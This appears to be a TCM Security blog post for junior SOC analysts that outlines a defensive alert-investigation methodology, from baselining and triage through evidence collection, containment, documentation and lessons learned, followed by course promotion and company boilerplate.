Having the technical skills to monitor a network and investigate an alert is important, but methodology is how those skills are efficiently and consistently applied to keep an organization secure. If you are a junior cyber security analyst just getting started (or hoping to get started) in a Security Operations Center (SOC), having a structured framework for how you monitor and investigate alerts will help you validate and respond to potential threats.
Without a sound methodology, monitoring can become sloppy, investigations can become chaotic, and important details may slip through the cracks. Each organization and team will have their own way of doing things, but we will take a look at some of the core steps in most SOC methodologies to give you an idea of how an investigation into an alert will look.
* If you’re interested in practical courses and real-world certifications for SOC Analysts and other blue team pursuits, take a look at TCM’s SOC Analyst certification roadmap.
0. Develop a Baseline
Before effective investigations can take place, analysts need to understand what “normal” looks like in their environment. Two simple and powerful metrics that should be understood are 1) common network traffic and 2) relevant logs.
Being familiar with the day-to-day network traffic will help you know which communication patterns, protocols, and services are expected in your organization, and this, in turn, allows anomalies to stand out.
Ensuring that logs are being collected across key systems (endpoints, firewalls, authentication, cloud services) provides invaluable data during an investigation and enables the formation of better-informed hypotheses. Without visibility, you are running blind.
A strong baseline forms the foundation for spotting suspicious activity.
1. Triaging Alerts
Alerts are the starting point for most SOC investigations, but not every alert is worth the same level of attention. It’s important to determine severity and priority of an alert by evaluating the potential business impact, such as “Is this affecting a production server or a low-priority workstation?”
How quickly you uncover what happened and what was affected during an incident, as well as being efficient and not wasting time wading through noise, will depend largely on the tuning of your alerts.
2. Investigation and Hypothesis
Once an alert passes triage, the real investigation begins. Analysts start by asking structured questions:
- Who is the user or system involved?
- What event took place?
- When did it happen, and has it happened before?
- Where did it come from?
During this process, analysts identify any Indicators of Compromise (IoCs) and often map activity against structured models, such as MITRE ATT&CK, to better understand possible adversary tactics. This step involves building hypotheses, or plausible explanations of what’s happening.
3. Collecting Evidence
Evidence collection turns suspicion into fact by gathering logs, process trees, or network artifacts, and then digging deeper.
A very useful and rightfully meme’d sidekick of the SOC analyst tool is a threat database, such as VirusTotal. Analysts will become very familiar with such tools, using them to search file hashes or IPs against known malicious activity. This can also be accomplished by cross-validating findings with other logs, threat intel feeds, or historical data.
Sandbox testing, which involves detonating suspected files in a controlled environment, is another option. However, great care should be taken when opening potentially malicious files, even in a sandbox environment. This can give insight into what a malicious file is actually doing and help confirm whether the activity is benign or malicious with a high degree of confidence.
Check out this blog post from Andrew Prince that dives into some tools that every SOC analyst should know.
4. Making A Decision
After reviewing the evidence, the analyst needs to make a call: Benign or Malicious. There will generally be procedures and standards in place to assist in next steps and how/who to report incidents to, as well as how to elevate a high-probability finding. Many times, the process will generally look like this:
Benign: Document the case, close it, and use the findings to refine detection rules if needed.
Malicious: Escalate to incident response teams for deeper handling, prepare to hand over collected evidence.
Knowing the processes of your organization can save valuable time and facilitate clear decision-making for positive and consistent outcomes across investigations.
5. (Bonus Step) Containment
This step can be reserved for senior-level analysts in some organizations, but if the threat is confirmed and severity warrants action pronto, containment begins immediately. Depending on protocols and authority, a junior analyst may have some responsibilities during this process, including:
- Quarantining the affected endpoint
- Blocking malicious IPs or domains
- Disabling compromised user accounts
Speed of containment is often a critical factor in the severity of an incident. The faster containment happens, the less opportunity attackers have to cause damage or establish persistence. Know your role and responsibilities concerning containment procedures.
6. Documenting The Incident
Everyone’s favorite step! But really, documentation isn’t so much ‘paperwork’ as ‘critical institutional memory’. Thorough and proper documentation ensures speed and efficiency by using previous experience to do most of the work for you the next time an event occurs. This allows for more time to spend on anomalous events that could prove hazardous to the organization. There are three general parts to a well-documented event:
- What was observed?
- What actions were taken?
- What was the final outcome?
While it may take more time to fill in the details with the first few occurrences of an event, being able to easily and quickly reproduce the steps the next hundred times is easily worth the time spent.
7. Lessons Learned
Every investigation, whether a false positive or a confirmed incident, is a chance to strengthen defenses. In the case of an inconsequential event, you may have developed a method of streamlining identification and documentation for future instances. If you’ve uncovered an incident, you may have new IoCs for tighter detection rules or updates to your organization’s playbooks. Going over the event afterward can produce actionable insight and improve the ability of the SOC as a whole.
Final Thoughts
The work of a SOC analyst is greatly improved with structure. As you progress in the SOC, you will develop your own additions to this basic methodology, but having that basic structure helps ensure consistency, accuracy, and agility in defending the organization. A disciplined process not only helps catch threats faster but also builds a stronger, more resilient security posture over time.
If you want to learn more about the details of SOC methodology, how to use the tools, and what it’s actually like to do the work of a security analyst, the SOC 101 course is a 32-hour, hands-on, no-filler, on-demand class that will prepare you for the duties of a SOC analyst. If you want to prove the skills you’ve learned in the class, the Practical SOC Analyst Associate certification is a practical examination of how you handle completing real-world tasks as a security analyst.
About the Author: Josh Daniels
Josh is an avid storyteller and writer who loves learning about the behind-the-scenes of the digital world we live in. While his professional experience is in content marketing, Josh began pursuing a career in cybersecurity in 2022, gaining a Sec+ certificate along with other training from industry professionals and a life long learner attitude.
When he is not writing, Josh enjoys outdoor adventures with his family, watching movies, reading, and an unofficial (unpaid) side gig as a Game Master Consultant for several friends who play table top RPGs. At TCM, Josh has found a home where his passion for storytelling and cybersecurity meet.
“Once men turned their thinking over to machines in the hope that this would set them free. But that only permitted other men with machines to enslave them.”
– Frank Herbert
About TCM Security
TCM Security is a veteran-owned, cybersecurity services and education company founded in Charlotte, NC. Our services division has the mission of protecting people, sensitive data, and systems. With decades of combined experience, thousands of hours of practice, and core values from our time in service, we use our skill set to secure your environment. The TCM Security Academy is an educational platform dedicated to providing affordable, top-notch cybersecurity training to our individual students and corporate clients including both self-paced and instructor-led online courses as well as custom training solutions. We also provide several vendor-agnostic, practical hands-on certification exams to ensure proven job-ready skills to prospective employers. Pentest Services: https://tcm-sec.com/our-services/ Follow Us: Email List | LinkedIn | YouTube | Twitter | Facebook | Instagram | TikTok
Contact Us: [email protected]
See How We Can Secure Your Assets
Let’s talk about how TCM Security can solve your cybersecurity needs. Give us a call, send us an e-mail, or fill out the contact form below to get started.